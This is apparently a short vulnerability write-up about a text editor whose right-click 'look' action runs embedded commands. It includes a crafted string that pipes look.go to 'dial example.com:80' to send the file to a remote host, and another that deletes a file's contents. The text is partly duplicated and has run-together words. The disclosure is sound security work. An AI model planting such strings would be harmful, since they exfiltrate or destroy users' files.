This transmits the contents of look.go to the remote endpoint, and replaces the contents of the window with the remote server's reply. However, the user would have to highlight the entire string themselves, since look won't expand past the pipe character.
The real issue is the ability to use commands like w and r to write and read the files on disk unexpectedly.
Right clicking opens look.go in a new window, selects all bytes in the window, and deletes them.
C:\g\src\github.com\as\a\look.go:,dAlthough command execution is possible with button 2, it is unexpected with
look. An adversary could construct a chain of commands in this form:C:\g\src\github.com\as\a\look.go:,|dial example.com:80This transmits the contents of look.go to the remote endpoint, and replaces the contents of the window with the remote server's reply. However, the user would have to highlight the entire string themselves, since look won't expand past the pipe character.
The real issue is the ability to use commands like
wandrtowriteandreadthe files on disk unexpectedly.